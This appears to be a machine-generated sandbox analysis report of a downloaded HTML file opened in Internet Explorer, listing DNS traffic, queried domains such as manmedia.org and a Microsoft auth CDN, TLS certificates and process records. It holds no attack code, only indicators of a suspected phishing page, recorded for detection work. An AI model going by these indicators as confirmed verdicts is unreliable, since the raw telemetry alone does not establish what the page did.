                                                  Feb 23, 2021 16:01:55.966543913 CET6034253192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:01:56.020889044 CET53603428.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:01:57.477029085 CET6134653192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:01:57.525707960 CET53613468.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:01:58.464972019 CET5177453192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:01:58.513637066 CET53517748.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:01:59.710099936 CET5602353192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:01:59.767611027 CET53560238.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:00.583790064 CET5838453192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:00.644685984 CET53583848.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:01.093095064 CET6026153192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:01.144609928 CET53602618.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:01.976259947 CET5606153192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:02.036315918 CET53560618.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:02.143903971 CET5833653192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:02.209268093 CET53583368.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:04.668682098 CET5378153192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:04.717261076 CET53537818.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:05.653724909 CET5406453192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:05.702496052 CET53540648.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:06.601361036 CET5281153192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:06.651658058 CET53528118.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:07.557215929 CET5529953192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:07.609883070 CET53552998.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:08.669234991 CET6374553192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:08.726890087 CET53637458.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:10.739449978 CET5005553192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:10.799523115 CET53500558.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:11.770328999 CET6137453192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:11.821803093 CET53613748.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:12.734819889 CET5033953192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:12.786484957 CET53503398.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:13.951509953 CET6330753192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:14.001426935 CET53633078.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:18.245417118 CET4969453192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:18.305520058 CET53496948.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:19.623764992 CET5498253192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:19.625435114 CET5001053192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:19.672889948 CET6371853192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:19.675731897 CET53500108.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:19.722986937 CET53637188.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:19.724246979 CET6211653192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:19.772965908 CET53621168.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:19.799175978 CET6381653192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:19.811990023 CET53549828.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:19.847739935 CET53638168.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:19.952163935 CET5501453192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:20.011754036 CET53550148.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:21.058018923 CET6220853192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:21.109530926 CET53622088.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:21.492175102 CET5757453192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:21.545072079 CET53575748.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:27.144164085 CET5181853192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:27.192840099 CET53518188.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:30.564531088 CET5662853192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:30.624289036 CET53566288.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:31.570382118 CET5662853192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:31.630390882 CET53566288.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:32.588417053 CET5662853192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:32.644265890 CET53566288.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:34.603355885 CET5662853192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:34.665745974 CET53566288.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:38.618885994 CET5662853192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:38.672883034 CET53566288.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:39.200639009 CET6077853192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:39.257771015 CET53607788.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:39.373820066 CET5379953192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:39.422380924 CET53537998.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:42.757272959 CET5468353192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:42.786381006 CET5932953192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:42.836890936 CET53593298.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:42.947171926 CET53546838.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:47.301731110 CET6402153192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:47.361794949 CET53640218.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:48.225008011 CET5612953192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:48.273657084 CET53561298.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:48.824106932 CET5817753192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:48.875699997 CET53581778.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:49.229999065 CET5612953192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:49.252506971 CET5070053192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:49.278628111 CET53561298.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:49.309638023 CET53507008.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:50.244508982 CET5612953192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:50.261003971 CET5070053192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:50.293301105 CET53561298.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:50.309602976 CET53507008.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:51.260147095 CET5070053192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:51.308711052 CET53507008.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:52.295689106 CET5612953192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:52.344383001 CET53561298.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:53.293883085 CET5070053192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:53.352950096 CET53507008.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:56.307324886 CET5612953192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:56.357923985 CET53561298.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:57.308763027 CET5070053192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:57.357343912 CET53507008.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:58.998047113 CET5406953192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:59.099615097 CET53540698.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:00.113002062 CET6117853192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:00.175487995 CET53611788.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:00.804245949 CET5701753192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:00.870345116 CET53570178.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:01.373361111 CET5632753192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:01.433697939 CET53563278.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:01.582216024 CET5024353192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:01.646534920 CET53502438.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:02.258481026 CET6205553192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:02.318363905 CET53620558.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:02.893904924 CET6124953192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:02.953095913 CET53612498.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:03.544648886 CET6525253192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:03.593317986 CET53652528.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:04.153687954 CET6436753192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:04.225543022 CET53643678.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:04.872262955 CET5506653192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:04.939877987 CET53550668.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:06.080887079 CET6021153192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:06.140974045 CET53602118.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:07.098139048 CET5657053192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:07.157731056 CET53565708.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:08.872299910 CET5845453192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:08.922627926 CET53584548.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:09.886121988 CET5845453192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:09.946911097 CET53584548.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:10.902343988 CET5845453192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:10.953257084 CET53584548.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:11.764092922 CET5518053192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:11.814476967 CET53551808.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:12.776983023 CET5518053192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:12.827263117 CET53551808.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:12.918086052 CET5845453192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:12.966739893 CET53584548.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:13.876075983 CET5518053192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:13.926209927 CET53551808.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:15.886631966 CET5518053192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:15.935420036 CET53551808.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:16.934031010 CET5845453192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:16.985090017 CET53584548.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:19.902928114 CET5518053192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:19.951489925 CET53551808.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:32.384936094 CET5872153192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:32.443727970 CET53587218.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:38.973121881 CET5769153192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:39.024638891 CET53576918.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:44.922283888 CET5294353192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:44.987657070 CET53529438.8.8.8192.168.2.6

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  Feb 23, 2021 16:02:01.976259947 CET192.168.2.68.8.8.80x4242Standard query (0)bms.kaseya.comA (IP address)IN (0x0001)
                                                  Feb 23, 2021 16:02:19.623764992 CET192.168.2.68.8.8.80x80a7Standard query (0)manmedia.orgA (IP address)IN (0x0001)
                                                  Feb 23, 2021 16:02:19.625435114 CET192.168.2.68.8.8.80x20fStandard query (0)code.jquery.comA (IP address)IN (0x0001)
                                                  Feb 23, 2021 16:02:19.672889948 CET192.168.2.68.8.8.80xcd77Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)
                                                  Feb 23, 2021 16:02:19.724246979 CET192.168.2.68.8.8.80x30e1Standard query (0)stackpath.bootstrapcdn.comA (IP address)IN (0x0001)
                                                  Feb 23, 2021 16:02:19.799175978 CET192.168.2.68.8.8.80x837cStandard query (0)ajax.aspnetcdn.comA (IP address)IN (0x0001)
                                                  Feb 23, 2021 16:02:21.058018923 CET192.168.2.68.8.8.80x478eStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)
                                                  Feb 23, 2021 16:02:39.200639009 CET192.168.2.68.8.8.80xe7c5Standard query (0)manmedia.orgA (IP address)IN (0x0001)
                                                  Feb 23, 2021 16:02:42.757272959 CET192.168.2.68.8.8.80xd1c0Standard query (0)manmedia.orgA (IP address)IN (0x0001)

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  Feb 23, 2021 16:02:02.036315918 CET8.8.8.8192.168.2.60x4242No error (0)bms.kaseya.comorigin-bms.kaseya.comCNAME (Canonical name)IN (0x0001)
                                                  Feb 23, 2021 16:02:02.036315918 CET8.8.8.8192.168.2.60x4242No error (0)origin-bms.kaseya.com52.144.52.222A (IP address)IN (0x0001)
                                                  Feb 23, 2021 16:02:02.036315918 CET8.8.8.8192.168.2.60x4242No error (0)origin-bms.kaseya.com52.144.52.223A (IP address)IN (0x0001)
                                                  Feb 23, 2021 16:02:19.675731897 CET8.8.8.8192.168.2.60x20fNo error (0)code.jquery.comcds.s5x3j6q5.hwcdn.netCNAME (Canonical name)IN (0x0001)
                                                  Feb 23, 2021 16:02:19.722986937 CET8.8.8.8192.168.2.60xcd77No error (0)cdnjs.cloudflare.com104.16.19.94A (IP address)IN (0x0001)
                                                  Feb 23, 2021 16:02:19.722986937 CET8.8.8.8192.168.2.60xcd77No error (0)cdnjs.cloudflare.com104.16.18.94A (IP address)IN (0x0001)
                                                  Feb 23, 2021 16:02:19.772965908 CET8.8.8.8192.168.2.60x30e1No error (0)stackpath.bootstrapcdn.comcds.j3z9t3p6.hwcdn.netCNAME (Canonical name)IN (0x0001)
                                                  Feb 23, 2021 16:02:19.811990023 CET8.8.8.8192.168.2.60x80a7No error (0)manmedia.org204.93.216.87A (IP address)IN (0x0001)
                                                  Feb 23, 2021 16:02:19.847739935 CET8.8.8.8192.168.2.60x837cNo error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)
                                                  Feb 23, 2021 16:02:21.109530926 CET8.8.8.8192.168.2.60x478eNo error (0)aadcdn.msftauth.netaadcdnoriginneu.azureedge.netCNAME (Canonical name)IN (0x0001)
                                                  Feb 23, 2021 16:02:21.109530926 CET8.8.8.8192.168.2.60x478eNo error (0)cs1100.wpc.omegacdn.net152.199.23.37A (IP address)IN (0x0001)
                                                  Feb 23, 2021 16:02:39.257771015 CET8.8.8.8192.168.2.60xe7c5No error (0)manmedia.org204.93.216.87A (IP address)IN (0x0001)
                                                  Feb 23, 2021 16:02:42.947171926 CET8.8.8.8192.168.2.60xd1c0No error (0)manmedia.org204.93.216.87A (IP address)IN (0x0001)

                                                  HTTPS Packets

                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                  Feb 23, 2021 16:02:19.921765089 CET104.16.19.94443192.168.2.649735CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEWed Oct 21 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Thu Oct 21 01:59:59 CEST 2021 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                  CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                  Feb 23, 2021 16:02:19.921802998 CET104.16.19.94443192.168.2.649736CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEWed Oct 21 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Thu Oct 21 01:59:59 CEST 2021 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                  CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                  Feb 23, 2021 16:02:21.315383911 CET152.199.23.37443192.168.2.649745CN=aadcdn.msftauth.net, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Jul 09 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013 Fri Nov 10 01:00:00 CET 2006Fri Jul 09 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023 Mon Nov 10 01:00:00 CET 2031771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                  CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 08 13:00:00 CET 2013Wed Mar 08 13:00:00 CET 2023
                                                  CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Nov 10 01:00:00 CET 2006Mon Nov 10 01:00:00 CET 2031
                                                  Feb 23, 2021 16:02:21.389024019 CET152.199.23.37443192.168.2.649744CN=aadcdn.msftauth.net, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Jul 09 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013 Fri Nov 10 01:00:00 CET 2006Fri Jul 09 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023 Mon Nov 10 01:00:00 CET 2031771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                  CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 08 13:00:00 CET 2013Wed Mar 08 13:00:00 CET 2023
                                                  CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Nov 10 01:00:00 CET 2006Mon Nov 10 01:00:00 CET 2031

                                                  Code Manipulations

                                                  Statistics

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Start time:16:01:59
                                                  Start date:23/02/2021
                                                  Path:C:\Program Files\internet explorer\iexplore.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                  Imagebase:0x7ff721e20000
                                                  File size:823560 bytes
                                                  MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  General

                                                  Start time:16:01:59
                                                  Start date:23/02/2021
                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5116 CREDAT:17410 /prefetch:2
                                                  Imagebase:0xfb0000
                                                  File size:822536 bytes
                                                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  General

                                                  Start time:16:02:16
                                                  Start date:23/02/2021
                                                  Path:C:\Program Files\internet explorer\iexplore.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html
                                                  Imagebase:0x7ff721e20000
                                                  File size:823560 bytes
                                                  MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  General

                                                  Start time:16:02:17
                                                  Start date:23/02/2021
                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17410 /prefetch:2
                                                  Imagebase:0xfb0000
                                                  File size:822536 bytes
                                                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  General

                                                  Start time:16:02:36
                                                  Start date:23/02/2021
                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17412 /prefetch:2
                                                  Imagebase:0xfb0000
                                                  File size:822536 bytes
                                                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  General

                                                  Start time:16:02:40
                                                  Start date:23/02/2021
                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17414 /prefetch:2
                                                  Imagebase:0xfb0000
                                                  File size:822536 bytes
                                                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  Disassembly

                                                  Reset < >